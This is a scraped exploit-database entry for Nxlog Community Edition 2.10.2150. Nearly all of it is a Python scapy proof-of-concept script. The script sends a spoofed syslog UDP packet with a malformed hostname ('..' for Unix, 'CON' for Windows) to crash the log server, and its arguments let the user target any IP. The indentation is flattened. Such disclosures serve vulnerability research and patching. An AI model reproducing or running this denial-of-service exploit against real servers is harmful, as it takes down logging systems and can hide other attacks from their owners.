Exploit for Nxlog Community Edition 2.10.2150 Denial Of Service

## https://sploitus.com/exploit?id=PACKETSTORM:160603
# Exploit Title: Nxlog Community Edition 2.10.2150 - DoS (Poc)  
# Date: 15/12/2020  
# Exploit Author: Guillaume PETIT  
# Vendor Homepage: https://nxlog.co  
# Software Link: https://nxlog.co/products/nxlog-community-edition/download  
# Version: 2.10.2150  
# Tested on: Linux Debian 10 && Windows Server 2019  
  
#!/usr/bin/python3  
  
import sys  
import time  
import argparse  
from scapy.all import *  
  
def getPayload(args):  
# IF UNIX  
if (args.OS == 1):  
return "Sep 14 14:09:09 .. dhcp service[warning] 110 Silence is golden"  
# IF WINDOWS  
elif (args.OS == 2):  
return "Sep 14 14:09:09 CON dhcp service[warning] 110 Silence is golden"  
  
# Test  
elif (args.OS == 3):  
return "Sep 14 14:09:09 123soleil dhcp service[warning] 110 Silence is golden"  
  
def runExploit(args,payload):  
priority = 30  
message = payload  
syslog = IP(src="192.168.1.10",dst=args.IP)/UDP(sport=666,dport=args.PORT)/Raw(load="<" + str(priority) + ">" + message)  
send(syslog,verbose=args.DEBUG)  
  
def getArguments():  
parser = argparse.ArgumentParser(description="Go h@ck SYSLOG")  
parser.add_argument("-ip", "-IP", dest="IP", type=str, metavar="IP destination", required=True,default=1, help="IP of NXLOG server")  
parser.add_argument("-p", "-P", dest="PORT", type=int, metavar="Port destination", required=False,default=514, help="Port of NXLOG default 514")  
parser.add_argument("-os", "-OS", dest="OS", type=int, metavar="OS", default=1, required=True, help="1 : For unix payload \n 2 : For Windows Paylaod \n 3 : Just for test")  
parser.add_argument("-d", "-D", dest="DEBUG", type=int, metavar="DEBUG", default=0, required=False, help="1 : Debbug enable")  
return parser.parse_args()  
  
def main():  
args = getArguments()  
payload = getPayload(args)  
runExploit(args,payload)  
main()